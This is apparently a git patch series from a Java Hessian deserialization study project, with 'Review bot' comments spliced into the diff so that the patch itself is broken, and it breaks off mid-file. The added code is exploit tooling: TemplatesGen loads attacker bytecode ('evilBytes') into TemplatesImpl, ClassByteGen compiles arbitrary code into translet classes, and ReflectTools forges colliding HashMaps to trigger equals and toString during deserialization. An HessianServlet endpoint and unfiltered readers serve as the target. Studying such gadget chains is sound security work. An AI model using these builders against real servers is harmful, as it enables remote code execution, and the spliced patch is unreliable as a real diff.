+++ b/hessian/src/main/java/com/test/pojo/Person.java
@@ -0,0 +1,29 @@
+package com.test.pojo;
+
+import java.io.Serializable;
+
+public class Person implements Serializable {
+ private int id;
+ private String name;
+
+ public Person(int id, String name) {
+ this.id = id;
+ this.name = name;
+ }
+
+ public int getId() {
+ return id;
+ }
+
+ public void setId(int id) {
+ this.id = id;
+ }
+
+ public String getName() {
+ return name;
+ }
+
+ public void setName(String name) {
+ this.name = name;
+ }
+}
diff --git a/hessian/src/main/java/com/test/server/HessianServiceImpl.java b/hessian/src/main/java/com/test/server/HessianServiceImpl.java
new file mode 100644
index 0000000..b439ee7
--- /dev/null
+++ b/hessian/src/main/java/com/test/server/HessianServiceImpl.java
@@ -0,0 +1,13 @@
+package com.test.server;
+
+import com.caucho.hessian.server.HessianServlet;
+
+import javax.servlet.annotation.WebServlet;
+
+@WebServlet(name = "hessian", value = "/hessian")
+public class HessianServiceImpl extends HessianServlet implements Service {
+ @Override
+ public String getCurrentTime() {
+ return "test time: 1970/01/01";
+ }
+}
diff --git a/hessian/src/main/java/com/test/server/Service.java b/hessian/src/main/java/com/test/server/Service.java
new file mode 100644
index 0000000..59934b9
--- /dev/null
+++ b/hessian/src/main/java/com/test/server/Service.java
@@ -0,0 +1,5 @@
+package com.test.server;
+
+public interface Service {
+ public String getCurrentTime();
+}
diff --git a/hessian/src/main/java/tools/ClassByteGen.java b/hessian/src/main/java/tools/ClassByteGen.java
new file mode 100644
index 0000000..0a0f32a
--- /dev/null
+++ b/hessian/src/main/java/tools/ClassByteGen.java
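Review bot: Person implements Serializable without declaring `serialVersionUID`, so its computed UID changes with every edit to the class; ReflectTools.makeClass in this same commit exists precisely to dodge UID mismatches, so the POJO meant to round-trip should pin one: `private static final long serialVersionUID = 1L;`. Hessian's field-based format ignores the UID as far as I know, but the Java-serialization helpers in ReflectTools (`ser2bytes`/`deser`) check it, so the field matters as soon as Person goes through them. A one-line class comment saying the POJO is the benign round-trip fixture would also help, since every other class in this package builds gadgets.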
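Review bot: HessianServiceImpl is the only network-facing piece of the module — every request to `/hessian` is decoded by HessianServlet's default SerializerFactory before getCurrentTime runs — yet nothing on the class says it is the trust boundary the gadget classes are aimed at. A Javadoc such as `/** Deserialization entry point for the study: HessianServlet reads request arguments with its default SerializerFactory, i.e. without a class allowlist. */` marks that for readers and points at the hardening knob (Hessian's `SerializerFactory.getClassFactory()` allow/deny list) the samples are testing against; the "no allowlist" part is my reading of the default and worth confirming for the Hessian version in the module's pom. `getCurrentTime` returning the fixed `"test time: 1970/01/01"` is fine for a stub, but since the name is part of the Service interface a comment `// constant on purpose; the method body is not what the study exercises` is clearer than renaming.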
@@ -0,0 +1,29 @@
+package tools;
+
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtConstructor;
+
+public class ClassByteGen {
+ public static byte[] getBytes(String code, String className) throws Exception {
+ String Abstract = "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";
+ ClassPool pool = ClassPool.getDefault();
+ pool.importPackage(Abstract);
+ pool.importPackage("java.io");
+ pool.importPackage("java.nio.file");
+ pool.importPackage("java.lang.reflect");
+ pool.importPackage("java.nio.charset");
+ pool.importPackage("java.util");
+ pool.insertClassPath(Abstract);
+// pool.insertClassPath("java.nio");
+ CtClass ctClass = pool.makeClass(className);
+ ctClass.setSuperclass(pool.get(Abstract));
+// CtConstructor ctConstructor = ctClass.makeClassInitializer();
+// ctConstructor.setBody(code);
+ CtConstructor ctConstructor1 = new CtConstructor(new CtClass[]{}, ctClass);
+ ctConstructor1.setBody(code);
+ ctClass.addConstructor(ctConstructor1);
+ ctClass.writeFile("ClassByteGen");
+ return ctClass.toBytecode();
+ }
+}
diff --git a/hessian/src/main/java/tools/HessianTools.java b/hessian/src/main/java/tools/HessianTools.java
new file mode 100644
index 0000000..2875d1c
--- /dev/null
+++ b/hessian/src/main/java/tools/HessianTools.java
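Review bot: `pool.insertClassPath(Abstract)` passes a class name where Javassist's `insertClassPath(String)` expects a directory or jar pathname, so it registers a search path for a directory that does not exist and contributes nothing; the superclass is actually resolved through the default pool's system path on the following `pool.get(Abstract)`. Either delete the line or, if pinning the lookup is the intent, use the API meant for it, `pool.insertClassPath(new ClassClassPath(AbstractTranslet.class))`. `ctClass.writeFile("ClassByteGen")` makes a method named getBytes also drop a .class file into the working directory on every call; if the file is wanted for inspection, move that to the caller or guard it behind a flag, and say so in a Javadoc on getBytes, which currently has none. The three commented-out lines (`insertClassPath("java.nio")` and the makeClassInitializer pair) are dead and should go, and the local `Abstract` wants a lowerCamelCase name such as `abstractTranslet`.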
@@ -0,0 +1,66 @@ +package tools; + +import com.caucho.hessian.io.*; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.IOException; + +public class HessianTools { + public static byte[] hessian2ToStringSer(Object obj) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + baos.write(67); + Hessian2Output hessian2Output = new Hessian2Output(baos); + + SerializerFactory serializerFactory = new SerializerFactory(); + serializerFactory.setAllowNonSerializable(true); + hessian2Output.setSerializerFactory(serializerFactory); + + hessian2Output.writeObject(obj); + hessian2Output.close(); + return baos.toByteArray(); + } + + + public static byte[] hessian2Ser2bytes(Object obj) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + Hessian2Output hessian2Output = new Hessian2Output(baos); + + SerializerFactory serializerFactory = new SerializerFactory(); + serializerFactory.setAllowNonSerializable(true); + hessian2Output.setSerializerFactory(serializerFactory); + + hessian2Output.writeObject(obj); + hessian2Output.close(); + return baos.toByteArray(); + } + + public static Object hessian2Deser(byte[] bytes) throws IOException { + ByteArrayInputStream bais = new ByteArrayInputStream(bytes); + Hessian2Input hessian2Input = new Hessian2Input(bais); + Object o = hessian2Input.readObject(); + hessian2Input.close(); + return o; + } + + public static byte[] hessianSer2bytes(Object obj) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + HessianOutput hessianOutput = new HessianOutput(baos); + + SerializerFactory serializerFactory = new SerializerFactory(); + serializerFactory.setAllowNonSerializable(true); + hessianOutput.setSerializerFactory(serializerFactory); + + hessianOutput.writeObject(obj); + hessianOutput.close(); + return baos.toByteArray(); + } + + public static Object hessianDeser(byte[] bytes) throws IOException { + ByteArrayInputStream 
bais = new ByteArrayInputStream(bytes); + HessianInput hessianInput = new HessianInput(bais); + Object o = hessianInput.readObject(); + hessianInput.close(); + return o; + } +} diff --git a/hessian/src/main/java/tools/IOTools.java b/hessian/src/main/java/tools/IOTools.java new file mode 100644 index 0000000..46d0567 --- /dev/null +++ b/hessian/src/main/java/tools/IOTools.java @@ -0,0 +1,12 @@ +package tools; + +import java.io.IOException; +import java.nio.file.Files; +import java.nio.file.Paths; + +public class IOTools { + public static byte[] readFile(String fileName) throws IOException { + byte[] bytes = Files.readAllBytes(Paths.get(fileName)); + return bytes; + } +} diff --git a/hessian/src/main/java/tools/InvocationHandlerImpl.java b/hessian/src/main/java/tools/InvocationHandlerImpl.java new file mode 100644 index 0000000..7c15d95 --- /dev/null +++ b/hessian/src/main/java/tools/InvocationHandlerImpl.java @@ -0,0 +1,19 @@ +package tools; + +import java.io.Serializable; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Method; + +// 动态代理,实现对象接口转化 +public class InvocationHandlerImpl implements InvocationHandler, Serializable { + private Object object; + + public InvocationHandlerImpl(Object obj) { + this.object = obj; + } + + @Override + public Object invoke(Object proxy, Method method, Object[] args) throws Throwable { + return null; + } +} diff --git a/hessian/src/main/java/tools/Payload.java b/hessian/src/main/java/tools/Payload.java new file mode 100644 index 0000000..5396724 --- /dev/null +++ b/hessian/src/main/java/tools/Payload.java @@ -0,0 +1,10 @@ +package tools; + +public abstract class Payload { +// public Templates getTemplates(byte[] byteCode, String bytePath) throws Exception { +// Templates templates = TemplatesGen.getTemplates(byteCode, bytePath); +// return templates; +// } + + public abstract String getPayload(byte[] byteCode, String bytePath) throws Exception; +} 
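Review bot: `baos.write(67)` in hessian2ToStringSer is the only thing that distinguishes it from hessian2Ser2bytes, and the bare number hides that 67 is the byte `'C'`, the Hessian 2 class-definition tag, placed ahead of the object stream — name it and say why it is there. The two methods are otherwise copy-pasted, and in all four writers `close()` is skipped when `writeObject` throws; a shared private writer with try/finally fixes both (sketch below; the Hessian 1 pair and the readers are untouched). On the read side, hessian2Deser and hessianDeser build their inputs with Hessian's default factory, which as far as I know has class allowlisting off; since that is the configuration the gadgets in this commit target, a comment on those two methods, `// default SerializerFactory, no allowlist; the hardened form is getClassFactory().setWhitelist(true) plus allow(...)`, would record what the harness is modelling.
```java
/** 0x43 = 'C', the Hessian 2 class-definition tag written ahead of the object in hessian2ToStringSer. */
private static final int CLASS_DEF_TAG = 'C';

public static byte[] hessian2ToStringSer(Object obj) throws IOException {
    return writeHessian2(obj, true);
}

public static byte[] hessian2Ser2bytes(Object obj) throws IOException {
    return writeHessian2(obj, false);
}

/** Shared Hessian 2 writer; the output is closed even when writeObject throws. */
private static byte[] writeHessian2(Object obj, boolean leadingClassDefTag) throws IOException {
    ByteArrayOutputStream baos = new ByteArrayOutputStream();
    if (leadingClassDefTag) {
        baos.write(CLASS_DEF_TAG);
    }
    Hessian2Output out = new Hessian2Output(baos);
    SerializerFactory serializerFactory = new SerializerFactory();
    serializerFactory.setAllowNonSerializable(true);
    out.setSerializerFactory(serializerFactory);
    try {
        out.writeObject(obj);
    } finally {
        out.close();
    }
    return baos.toByteArray();
}
// … unchanged: hessian2Deser, hessianSer2bytes, hessianDeser …
```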
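Review bot: `invoke` in InvocationHandlerImpl unconditionally returns `null` and the `object` field assigned in the constructor is never read, so the class cannot yet do the "convert an object to an interface" job its Chinese header comment describes; if it is a stub, `// TODO: delegate via method.invoke(object, args)` on the return line makes that explicit, otherwise the delegation is missing. Returning `null` from a proxy whose interface method has a primitive return type throws NullPointerException at the call site, which is worth a comment if the stub is intentional. The class is `Serializable` but `object` is typed `Object`, so Java serialization of the handler fails with NotSerializableException whenever the wrapped value is not itself Serializable — a `// object must be Serializable for ser2bytes to work` note would save a surprise.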
diff --git a/hessian/src/main/java/tools/ReflectTools.java b/hessian/src/main/java/tools/ReflectTools.java
new file mode 100644
index 0000000..f8e30a9
--- /dev/null
+++ b/hessian/src/main/java/tools/ReflectTools.java
@@ -0,0 +1,200 @@ +package tools; + +import javassist.CannotCompileException; +import javassist.ClassPool; +import javassist.CtClass; +import javassist.CtField; + +import java.io.*; +import java.lang.reflect.Array; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.Modifier; +import java.util.Base64; +import java.util.HashMap; +import java.util.concurrent.ConcurrentHashMap; + +public class ReflectTools { + public static void setFieldValue(Object obj, String fieldName, Object value) throws IllegalAccessException { + Class aClass = obj.getClass(); + Field field = null; + while (aClass != null){ + try { + field = aClass.getDeclaredField(fieldName); + break; + } catch (NoSuchFieldException e) { + aClass = aClass.getSuperclass(); + } + } + field.setAccessible(true); + field.set(obj, value); + } + + // 修改static final 字段 + public static void setFinalField(Object object, String fieldName, Object newValue) throws Exception { + // 获取指定类的 Class 对象 + Class clazz = object.getClass(); + + // 获取 private final 字段 + Field field = clazz.getDeclaredField(fieldName); + + // 使私有字段可以访问 + field.setAccessible(true); + + // 移除 final 修饰符 + Field modifiersField = Field.class.getDeclaredField("modifiers"); + modifiersField.setAccessible(true); + modifiersField.setInt(field, field.getModifiers() & ~java.lang.reflect.Modifier.FINAL); + + // 修改字段的值 + field.set(object, newValue); + } + + public static Object getFieldValue(Object obj, String fieldName) throws NoSuchFieldException, IllegalAccessException { + Class aClass = obj.getClass(); + + while (aClass != null){ + try{ + Field declaredField = aClass.getDeclaredField(fieldName); + declaredField.setAccessible(true); + return declaredField.get(obj); + }catch(NoSuchFieldException e){ + aClass = aClass.getSuperclass(); + } + } + return null; + } + + public static HashMap makeMap (Object v1, Object v2 ) throws Exception { + HashMap s = new HashMap<>(); + setFieldValue(s, "size", 2); + Class nodeC; + try 
{ + nodeC = Class.forName("java.util.HashMap$Node"); + } + catch ( ClassNotFoundException e ) { + nodeC = Class.forName("java.util.HashMap$Entry"); + } + Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); + nodeCons.setAccessible(true); + Object tbl = Array.newInstance(nodeC, 2); + Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null)); + Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null)); + setFieldValue(s, "table", tbl); + return s; + } + + // 制作hash冲突map,实现调用called.equals(param) + public static HashMap makeEqualMap(Object called, Object param) throws Exception { + HashMap hashMap1 = new HashMap<>(); + HashMap hashMap2 = new HashMap<>(); + hashMap1.put("zZ", called); + hashMap1.put("yy", param); + hashMap2.put("zZ", param); + hashMap2.put("yy", called); + + HashMap finalMap = makeMap(hashMap2, hashMap1); + + return finalMap; + } + + public static ConcurrentHashMap makeConcurrentMap (Object v1, Object v2 ) throws Exception { + ConcurrentHashMap s = new ConcurrentHashMap(); + setFieldValue(s, "sizeCtl", 2); + Class nodeC; + try { + nodeC = Class.forName("java.util.concurrent.ConcurrentHashMap$Node"); + } + catch ( ClassNotFoundException e ) { + nodeC = Class.forName("java.util.concurrent.ConcurrentHashMap$Entry"); + } + Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); + nodeCons.setAccessible(true); + Object tbl = Array.newInstance(nodeC, 2); + Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null)); + Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null)); + setFieldValue(s, "table", tbl); + Field table = ConcurrentHashMap.class.getDeclaredField("table"); + table.setAccessible(true); + table.set(s, tbl); + + return s; + } + + // 生成不继承Serializable接口的Class,防止因suid不一样报错 + public static Class makeClass(String className, String suid) throws ClassNotFoundException, CannotCompileException { + ClassPool pool = ClassPool.getDefault(); + CtClass ctClass = 
pool.makeClass(className); + + if (suid != null) { + // 添加 serialVersionUID 字段并指定其值 + CtField serialVersionUIDField = new CtField(CtClass.longType, "serialVersionUID", ctClass); + serialVersionUIDField.setModifiers(Modifier.PRIVATE | Modifier.STATIC | Modifier.FINAL); // 设置为private static final + ctClass.addField(serialVersionUIDField, suid); // 设置 serialVersionUID 值为 1L + } + + Class aClass = ctClass.toClass(); + return aClass; + } + + // 用于在HashMap中制造hash碰撞,从而触发equals,用于XString系列的equals触发;有时会失败,如XBean链,原因未知 + public static String unhash ( int hash ) { + int target = hash; + StringBuilder answer = new StringBuilder(); + if ( target < 0 ) { + // String with hash of Integer.MIN_VALUE, 0x80000000 + answer.append("\u0915\u0009\u001e\u000c\u0002"); + + if ( target == Integer.MIN_VALUE ) + return answer.toString(); + // Find target without sign bit set + target = target & Integer.MAX_VALUE; + } + + unhash0(answer, target); + return answer.toString(); + } + private static void unhash0 ( StringBuilder partial, int target ) { + int div = target / 31; + int rem = target % 31; + + if ( div <= Character.MAX_VALUE ) { + if ( div != 0 ) + partial.append((char) div); + partial.append((char) rem); + } + else { + unhash0(partial, div); + partial.append((char) rem); + } + } + + + public static byte[] ser2bytes(Object obj) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(baos); + oos.writeObject(obj); + return baos.toByteArray(); + } + + public static void ser2file(Object obj, String fileName) throws IOException { + FileOutputStream fos = new FileOutputStream(fileName); + ObjectOutputStream oos = new ObjectOutputStream(fos); + oos.writeObject(obj); + } + + public static Object deser(byte[] bytes, String base64) throws IOException, ClassNotFoundException { + if (bytes != null) { + ByteArrayInputStream bais = new ByteArrayInputStream(bytes); + ObjectInputStream ois = new ObjectInputStream(bais); + return 
ois.readObject(); + }else { + byte[] decode = Base64.getDecoder().decode(base64); + ByteArrayInputStream bais = new ByteArrayInputStream(decode); + ObjectInputStream ois = new ObjectInputStream(bais); + return ois.readObject(); + } + } + + +} diff --git a/hessian/src/main/java/tools/TemplatesGen.java b/hessian/src/main/java/tools/TemplatesGen.java new file mode 100644 index 0000000..ccf9bac --- /dev/null +++ b/hessian/src/main/java/tools/TemplatesGen.java @@ -0,0 +1,34 @@ +package tools; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import javassist.CannotCompileException; +import javassist.ClassPool; +import javassist.CtClass; + +import javax.xml.transform.Templates; +import java.io.IOException; +import java.nio.file.Files; +import java.nio.file.Paths; + +public class TemplatesGen { + public static Templates getTemplates(byte[] byteCode, String bytePath) throws IOException, IllegalAccessException, CannotCompileException { + byte[] evilBytes; + if (byteCode != null) { + evilBytes = byteCode; + }else { + evilBytes = Files.readAllBytes(Paths.get(bytePath)); + } + TemplatesImpl templates = new TemplatesImpl(); + ClassPool pool = ClassPool.getDefault(); + CtClass ctClass = pool.makeClass("useless"); + byte[] useless = ctClass.toBytecode(); + ReflectTools.setFieldValue(templates, "_name", "1diot9"); + ReflectTools.setFieldValue(templates, "_class", null); +// ReflectTools.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl()); + ReflectTools.setFieldValue(templates, "_transletIndex", 0); + // 修改bytecodes数量和transletIndex,这样就不用继承AbstractTranslet + ReflectTools.setFieldValue(templates, "_bytecodes", new byte[][]{evilBytes, useless}); + return templates; + } + +} diff --git a/hessian/src/main/java/tools/UnsafeTools.java b/hessian/src/main/java/tools/UnsafeTools.java new file mode 100644 index 0000000..6579cca --- /dev/null +++ b/hessian/src/main/java/tools/UnsafeTools.java 
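Review bot: setFieldValue dereferences `field` after the hierarchy walk without checking it, so a misspelled field name surfaces as a bare NullPointerException on `field.setAccessible(true)` instead of naming the missing field — and nearly every gadget builder in this commit goes through this method, so that is the error they will all report. ser2file opens a FileOutputStream and an ObjectOutputStream and closes neither; try-with-resources fixes the handle leak (both changes sketched below). Two further points: `setFinalField` relies on `Field.class.getDeclaredField("modifiers")`, which is filtered from reflection on JDK 12 and later and throws NoSuchFieldException there, so a comment pinning it to JDK 8–11 would save debugging; and makeConcurrentMap assigns `table` twice, once via `setFieldValue(s, "table", tbl)` and again through a hand-rolled Field, so the second block is redundant. `deser` reads back with a plain ObjectInputStream, which is fine for a local round-trip of the module's own bytes but is the classic sink, so a `// intentionally unfiltered: local round-trip only` comment marks that it is not an oversight.
```java
public static void setFieldValue(Object obj, String fieldName, Object value) throws IllegalAccessException {
    // … unchanged: walk up the class hierarchy looking for fieldName …
    if (field == null) {
        throw new IllegalArgumentException("no field '" + fieldName + "' in " + obj.getClass().getName() + " or its supertypes");
    }
    field.setAccessible(true);
    field.set(obj, value);
}

// … unchanged: setFinalField … ser2bytes …

/** Java-serializes obj to fileName; both streams are closed even on failure. */
public static void ser2file(Object obj, String fileName) throws IOException {
    try (ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(fileName))) {
        oos.writeObject(obj);
    }
}
```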
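Review bot: getTemplates falls through to `Paths.get(bytePath)` when `byteCode` is null, so a call with both arguments null fails with a NullPointerException out of Paths rather than a message naming the problem; a guard at the top, `if (byteCode == null && bytePath == null) throw new IllegalArgumentException("byteCode or bytePath is required");`, reads better. The Chinese comment above the `_bytecodes` write is the one line that explains the two-element array and `_transletIndex = 0` and deserves to be in English next to the field writes — `// two bytecode entries plus _transletIndex = 0: the class at index 0 does not need to extend AbstractTranslet`. The commented-out `_tfactory` line is dead and can go, and a Javadoc on getTemplates should state that exactly one of byteCode/bytePath is consulted, byteCode taking precedence.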
@@ -0,0 +1,15 @@
+package tools;
+
+import sun.misc.Unsafe;
+
+import java.lang.reflect.Field;
+
+public class UnsafeTools {
+ // 绕过构造方法获取对象
+ public static Object getObjectByUnsafe(Class clazz) throws Exception{
+ Field theUnsafe = Unsafe.class.getDeclaredField("theUnsafe");
+ theUnsafe.setAccessible(true);
+ Unsafe unsafe = (Unsafe) theUnsafe.get(null);
+ return unsafe.allocateInstance(clazz);
+ }
+}
diff --git a/hessian/src/main/java/tools/sinkClass/ToStringClass.java b/hessian/src/main/java/tools/sinkClass/ToStringClass.java
new file mode 100644
index 0000000..7169c10
--- /dev/null
+++ b/hessian/src/main/java/tools/sinkClass/ToStringClass.java
@@ -0,0 +1,15 @@
+package tools.sinkClass;
+
+import java.io.Serializable;
+
+public class ToStringClass implements Serializable {
+ public String toString(){
+ System.out.println("toString pwned");
+ return "toString pwned";
+ }
+
+ public int hashCode(){
+ System.out.println("hashCode pwned");
+ return 0;
+ }
+}
From aba303a8d07f51faf0848fcf52c3b6323a155c21 Mon Sep 17 00:00:00 2001
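Review bot: getObjectByUnsafe takes a raw `Class`; `Class<?> clazz` costs nothing and removes the rawtypes warning, and going one step further to `public static <T> T getObjectByUnsafe(Class<T> clazz)` with `return clazz.cast(unsafe.allocateInstance(clazz));` would let callers such as PKCS9_BCEL stop juggling `Object`. The header comment only says the constructor is bypassed; the consequence worth stating is that every field of the returned instance is at its JVM default and no invariant has been established, which is why every caller follows up with setFieldValue — `/** Allocates an instance without running any constructor; all fields start at their JVM defaults, so the caller must populate what it relies on. */`. The method also declares a bare `throws Exception`; the reflective lookups throw NoSuchFieldException and IllegalAccessException, and allocateInstance throws InstantiationException, so listing those three is both more accurate and more useful to callers.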
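Review bot: `toString` and `hashCode` in ToStringClass override Object's methods without `@Override`, and `hashCode` is overridden while `equals` is not, which breaks the equals/hashCode contract as soon as two instances share a HashMap (unequal yet same hash). Since the class exists to make the sink observable rather than to model data, say so on the class: `/** Probe: prints when the deserializer calls toString() or hashCode(), the two triggers the toStringBased package relies on. Not a value type — equals is deliberately left alone. */` and add `@Override` to both methods. The constant `0` from hashCode is presumably deliberate, to force bucket collisions in the maps ReflectTools builds, and deserves the same one-line comment.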
From: 1diot9 <2868944833@qq.com> Date: Sun, 23 Nov 2025 13:55:36 +0800 Subject: [PATCH 14/16] rename folder --- hessian/HessianStudy/.gitignore | 38 ------- hessian/HessianStudy/.idea/.gitignore | 8 -- .../HessianStudy/.idea/codeStyles/Project.xml | 7 -- .../.idea/codeStyles/codeStyleConfig.xml | 5 - hessian/HessianStudy/.idea/encodings.xml | 7 -- hessian/HessianStudy/.idea/misc.xml | 14 --- hessian/HessianStudy/.idea/vcs.xml | 4 - hessian/HessianStudy/pom.xml | 36 ------ hessian/HessianStudy/ser.bin | 1 - .../src/main/java/com/hessian/Tools.java | 78 ------------- .../java/com/hessian/asServlet/Hello.java | 9 -- .../com/hessian/asServlet/HelloClient.java | 19 ---- .../com/hessian/asServlet/HelloServer.java | 18 --- .../java/com/hessian/deser/DeserTest.java | 20 ---- .../Hessian2OutputWithOverlongEncoding.java | 107 ------------------ .../com/hessian/deser/UTF_8_OverLong.java | 47 -------- .../main/java/com/hessian/pojo/Person.java | 27 ----- .../main/java/com/hessian/ser/SerTest.java | 28 ----- hessian/HessianStudy/utf8.bin | Bin 2019 -> 0 bytes hessian/dubbo/.gitignore | 38 ------- hessian/dubbo/.idea/.gitignore | 8 -- hessian/dubbo/.idea/encodings.xml | 7 -- hessian/dubbo/.idea/misc.xml | 14 --- hessian/dubbo/.idea/vcs.xml | 4 - hessian/dubbo/pom.xml | 29 ----- .../dubbo/src/main/java/org/example/Main.java | 7 -- 26 files changed, 580 deletions(-) delete mode 100644 hessian/HessianStudy/.gitignore delete mode 100644 hessian/HessianStudy/.idea/.gitignore delete mode 100644 hessian/HessianStudy/.idea/codeStyles/Project.xml delete mode 100644 hessian/HessianStudy/.idea/codeStyles/codeStyleConfig.xml delete mode 100644 hessian/HessianStudy/.idea/encodings.xml delete mode 100644 hessian/HessianStudy/.idea/misc.xml delete mode 100644 hessian/HessianStudy/.idea/vcs.xml delete mode 100644 hessian/HessianStudy/pom.xml delete mode 100644 hessian/HessianStudy/ser.bin delete mode 100644 hessian/HessianStudy/src/main/java/com/hessian/Tools.java delete mode 100644 
hessian/HessianStudy/src/main/java/com/hessian/asServlet/Hello.java delete mode 100644 hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloClient.java delete mode 100644 hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloServer.java delete mode 100644 hessian/HessianStudy/src/main/java/com/hessian/deser/DeserTest.java delete mode 100644 hessian/HessianStudy/src/main/java/com/hessian/deser/Hessian2OutputWithOverlongEncoding.java delete mode 100644 hessian/HessianStudy/src/main/java/com/hessian/deser/UTF_8_OverLong.java delete mode 100644 hessian/HessianStudy/src/main/java/com/hessian/pojo/Person.java delete mode 100644 hessian/HessianStudy/src/main/java/com/hessian/ser/SerTest.java delete mode 100644 hessian/HessianStudy/utf8.bin delete mode 100644 hessian/dubbo/.gitignore delete mode 100644 hessian/dubbo/.idea/.gitignore delete mode 100644 hessian/dubbo/.idea/encodings.xml delete mode 100644 hessian/dubbo/.idea/misc.xml delete mode 100644 hessian/dubbo/.idea/vcs.xml delete mode 100644 hessian/dubbo/pom.xml delete mode 100644 hessian/dubbo/src/main/java/org/example/Main.java diff --git a/hessian/HessianStudy/.gitignore b/hessian/HessianStudy/.gitignore deleted file mode 100644 index 5ff6309..0000000 --- a/hessian/HessianStudy/.gitignore +++ /dev/null @@ -1,38 +0,0 @@ -target/ -!.mvn/wrapper/maven-wrapper.jar -!**/src/main/**/target/ -!**/src/test/**/target/ - -### IntelliJ IDEA ### -.idea/modules.xml -.idea/jarRepositories.xml -.idea/compiler.xml -.idea/libraries/ -*.iws -*.iml -*.ipr - -### Eclipse ### -.apt_generated -.classpath -.factorypath -.project -.settings -.springBeans -.sts4-cache - -### NetBeans ### -/nbproject/private/ -/nbbuild/ -/dist/ -/nbdist/ -/.nb-gradle/ -build/ -!**/src/main/**/build/ -!**/src/test/**/build/ - -### VS Code ### -.vscode/ - -### Mac OS ### -.DS_Store \ No newline at end of file 
diff --git a/hessian/HessianStudy/.idea/.gitignore b/hessian/HessianStudy/.idea/.gitignore deleted file mode 100644 index 35410ca..0000000 --- a/hessian/HessianStudy/.idea/.gitignore +++ /dev/null @@ -1,8 +0,0 @@ -# 默认忽略的文件 -/shelf/ -/workspace.xml -# 基于编辑器的 HTTP 客户端请求 -/httpRequests/ -# Datasource local storage ignored files -/dataSources/ -/dataSources.local.xml diff --git a/hessian/HessianStudy/.idea/codeStyles/Project.xml b/hessian/HessianStudy/.idea/codeStyles/Project.xml deleted file mode 100644 index 919ce1f..0000000 --- a/hessian/HessianStudy/.idea/codeStyles/Project.xml +++ /dev/null @@ -1,7 +0,0 @@ - - - - - - \ No newline at end of file diff --git a/hessian/HessianStudy/.idea/codeStyles/codeStyleConfig.xml b/hessian/HessianStudy/.idea/codeStyles/codeStyleConfig.xml deleted file mode 100644 index a55e7a1..0000000 --- a/hessian/HessianStudy/.idea/codeStyles/codeStyleConfig.xml +++ /dev/null @@ -1,5 +0,0 @@ - - - - \ No newline at end of file diff --git a/hessian/HessianStudy/.idea/encodings.xml b/hessian/HessianStudy/.idea/encodings.xml deleted file mode 100644 index aa00ffa..0000000 --- a/hessian/HessianStudy/.idea/encodings.xml +++ /dev/null @@ -1,7 +0,0 @@ - - - - - - - \ No newline at end of file diff --git a/hessian/HessianStudy/.idea/misc.xml b/hessian/HessianStudy/.idea/misc.xml deleted file mode 100644 index 556467a..0000000 --- a/hessian/HessianStudy/.idea/misc.xml +++ /dev/null @@ -1,14 +0,0 @@ - - - - - - - - - - \ No newline at end of file diff --git a/hessian/HessianStudy/.idea/vcs.xml b/hessian/HessianStudy/.idea/vcs.xml deleted file mode 100644 index d843f34..0000000 --- a/hessian/HessianStudy/.idea/vcs.xml +++ /dev/null @@ -1,4 +0,0 @@ - - - - \ No newline at end of file diff --git a/hessian/HessianStudy/pom.xml b/hessian/HessianStudy/pom.xml deleted file mode 100644 index dd82d26..0000000 --- a/hessian/HessianStudy/pom.xml +++ /dev/null 
@@ -1,36 +0,0 @@ - - 4.0.0 - com.example - HessianStudy - war - 1.0-SNAPSHOT - HessianStudy Maven Webapp - http://maven.apache.org - - - junit - junit - 3.8.1 - test - - - com.caucho - hessian - 4.0.63 - - - javax.servlet - servlet-api - 2.5 - - - com.alibaba - fastjson - 1.2.24 - - - - HessianStudy - - diff --git a/hessian/HessianStudy/ser.bin b/hessian/HessianStudy/ser.bin deleted file mode 100644 index 22f2dce..0000000 --- a/hessian/HessianStudy/ser.bin +++ /dev/null @@ -1 +0,0 @@ -Ccom.hessian.pojo.Personnameagemap`1diOt9HnamemaxyyyZ \ No newline at end of file diff --git a/hessian/HessianStudy/src/main/java/com/hessian/Tools.java b/hessian/HessianStudy/src/main/java/com/hessian/Tools.java deleted file mode 100644 index 5dc74d5..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/Tools.java +++ /dev/null 
@@ -1,78 +0,0 @@ -package com.hessian; - -import com.sun.org.apache.xalan.internal.xsltc.compiler.Template; -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; - -import java.io.IOException; -import java.lang.reflect.Array; -import java.lang.reflect.Constructor; -import java.lang.reflect.Field; -import java.nio.file.Files; -import java.nio.file.Paths; -import java.util.HashMap; - -public class Tools { - public static void setFieldValue(Object obj, String fieldName, Object value) throws IllegalAccessException { - Class aClass = obj.getClass(); - Field field = null; - while (aClass != null) { - try { - field = aClass.getDeclaredField(fieldName); - break; - } catch (NoSuchFieldException e) { - aClass = aClass.getSuperclass(); - } - } - field.setAccessible(true); - field.set(obj, value); - } - - public static Object getFieldValue(Object obj, String fieldName){ - Class aClass = obj.getClass(); - Field field = null; - while (aClass != null) { - try { - field = aClass.getDeclaredField(fieldName); - field.setAccessible(true); - return field.get(obj); - } catch (NoSuchFieldException e) { - aClass = aClass.getSuperclass(); - } catch (IllegalAccessException e) { - throw new RuntimeException(e); - } - } - return null; - } - - public static TemplatesImpl getTemplatesImpl() throws IllegalAccessException, IOException { - TemplatesImpl templatesImpl = new 